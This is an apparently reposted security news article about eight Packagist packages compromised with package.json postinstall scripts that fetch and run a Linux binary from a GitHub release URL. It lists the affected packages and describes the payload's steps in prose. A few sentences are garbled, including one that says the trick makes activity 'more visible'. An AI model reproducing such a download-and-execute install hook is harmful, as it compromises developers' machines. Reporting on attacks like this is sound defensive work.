A new “coordinated” supply chain attack campaign affected eight packages on Packagist that contained malicious code designed to execute Linux binaries retrieved from GitHub release URLs.
“The affected packages were all Composer packages, but the malicious code was not added to composer.json,” Socket said. “Instead, it was inserted into package.json for projects that ship JavaScript build tools along with PHP code.”
This “cross-ecosystem deployment” makes activity more visible to developers and security teams scanning PHP dependencies, as they may focus only on Composer-related metadata while skipping package.json lifecycle hooks bundled within packages. The malicious version has since been removed from Packagist.
Analysis of the package reveals that the upstream repository has been modified to include a post-installation script that attempts to download Linux binaries from a GitHub release URL (‘github’).[.]com/parikhpreyash4/systemd-network-helper-aa5c751f”) in the “/tmp/.sshd” folder, change the permissions using “chmod” to give execution permissions to all users, and run it in the background.
The package names and associated affected versions are listed below.
moritz-sauer-13/silver Stripe-cms-theme (dev-master) crosiersource/crosierlib-base (dev-master) devdojo/wave (dev-main) devdojo/genesis (dev-main) katanaui/katana (dev-main) Elitedevsquad/sidecar-laravel (3.x-dev) r2luna/brain (dev-main) baskarcm/tzi-chat-ui (dev-main)
Socket’s investigation found references to the same payload across 777 files in GitHub, suggesting it may be part of a broader campaign. Added to GitHub workflow at least twice. However, it is currently unclear how many of these match individual compromises, forks, duplicate package artifacts, or cached references.
“This suggests that the attackers did not rely on a single execution mechanism. In the package artifact, the payload was triggered through the package.json post-installation script,” the application security firm said. “In the workflow file, it was placed to run during a GitHub Actions job.”
Furthermore, the exact nature of the payload downloaded from GitHub is unknown as the GitHub account associated with the repository hosting it is no longer available. The choice of name “gvfsd-network” for this malware is interesting. This is because it refers to the GNOME Virtual File System (GVfs) daemon, which is responsible for managing and browsing network shares.
“Even without the second-stage binary, a malicious installer is enough to warrant blocking,” Socket said. “It executes code remotely during the installation or build workflow and attempts to hide its activity by disabling TLS validation, suppressing errors, and running downloaded binaries in the background.”
Source link
